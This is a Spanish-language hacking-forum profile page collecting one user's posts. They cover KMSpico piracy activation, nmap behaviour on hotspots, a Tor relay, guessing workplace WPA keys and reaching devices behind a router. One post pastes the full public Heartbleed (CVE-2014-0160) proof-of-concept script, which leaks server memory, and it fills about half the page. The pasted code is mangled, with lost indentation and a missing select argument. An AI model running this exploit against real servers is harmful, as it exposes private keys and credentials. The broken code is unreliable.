Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - roothelp

#1
Windows / kmspico tiene virus
24 Diciembre 2015, 18:53 PM
Y cual puede fiable ya que todos los que bajo me dan positivos en virus total
#2
Windows / kmspico tiene virus
24 Diciembre 2015, 18:13 PM
El caso es que quiero activar windows 10 pero veo en sitios web que tiene virus, yo he testteado varios con virustotal y la verdad que salen bastantes. Realmente es asi o es una artimaña para que no activemos windows de manera ilegal???
Gracias de antemano.
#3
Es curioso si te conectas a wifi tipo mcdonals, hoteles y demas, cuando haces un nmap -sP y el ramgo que quieres escanear, no aparece ninguna ip salvo la tuya y la dlel router. Pero lo curioso que antes esto no ocurria, ¿porque ocurre esto alguien sabe como consiguen ocultar el resto de los usuarios que estan conectados.?
#4
Bugs y Exploits / Re: exploit Heartbleed
14 Abril 2014, 21:00 PM
yo ese script lo he ejecutado con el interprete de python de linux, asi como varios parecidos y todos me dan error en el codigo del script, el problema que como no entiendo python no se exactamente donde se encuentra el error.
#5
En security focus esta este exploit, pero no se si es para averiguar si el servidor esta afectado por el bug o es para explotar la vulnerabilidad:

#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford
(jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test
for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP
port to test (default: 443)')

def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print

def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select(, [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata

def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed
connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed
connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' %
(typ, ver, len(pay))
return typ, ver, pay

def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False

if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is
vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any
extra data.'
return True

if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False

def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break

print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s)

if __name__ == '__main__':
main()

¿Alguno lo habeis utilizado?, yo lo he ejecutado pero me da error en el parser, no se si es porque hay que modificar algo en el codigo o porque no le meto parametros y por eso peta el script.
#6
Redes / crear un nodo tor con ubuntu server
8 Marzo 2014, 11:56 AM
Me gustaria crear un nodo tor en un pentium III a 600 Mzh con 256 megas de ram y que ejecuta ubuntu server 12.04  El caso que he leido que con vidalia y abriendo los puertos del router, se puede hacer pero vidalia funciona en modo grafico y no veo que se pueda configurar con el bash de linux. ¿hay alguna manera de hacerlo?.
Por otro lado un equipo con tan pocos recursos podria soportar el trafico que viaja a traves de la red tor sin saturarse.
Un saludo.
 
#7
el caso es que en un curro han puesto un router o firewall de la marca fortinet que cuando te conectas a el te pide una clave wpa. En esa oficina hay 10 personas, pues cada una tiene una clave wpa distinta y cuando acceder a la red wifi tienen que meter una clave distinta (cada una la suya). NO es el tipico HOtspot de macdonals o de ayuntamiento donde accedes a una red libre y cuando pones el navegador tienes que aceptar las condiciones de uso o tienes que meter un user o pass en el navegador.
Esto es distinto, cuando selecionas la wifi tienes que meter la clave wpa y se la metes, pero lo curioso es que cada usuario tiene su propia clave wpa.
¿pueden ser estas claves wpa seguir algun tipo de patron, ya que son generadas pro un ordenador, no son claves generadas por un usuario?.
Gracias de antemano.
#8
Si lo puedes administrar pero yo lo que me refiero es poder conectarte a los equipos que estan conectados a su red interna, creo que como no sea con VPN no es posible.
#9
Hola, me gustaria saber si se puede tener acceso a la red local de un router que consiguo tener acceso mediante su ip publica y gestionarlo mediante web, pero no puede ser mediante vpn ya que solo tengo acceso a el para su administracion pero no puedo acceder a los equipos que estan conectados a el via wifi ni instalarles ninguna aplicacion a los subsodichos equipos ni logicamente un servidor vpn.
Quizas pueda abrir en forward el puerto netbios en un equipo en concreto y acceder a sus recursos compartidos mediante la ip publica del router.
¿alguna idea, gracias de antemano?
#10
Redes / mac distintas para una misma ip
8 Octubre 2011, 12:40 PM
La verdad que vengo observando que cuando hago un scaneo con nmap me da una direccion ip y una mac pero cuando miro que mac le corresponde a cada ip a traves del firware del router me da otra mac distinta, lo miismo me ocurre escaneando redes con el paquete de utilidades aircrack (creo que es el airodump).
¿porque varia la mac si la ip es la misma?. Es algo que me ha sucedido con varias tarjetas wifi.
Gracias de antemano.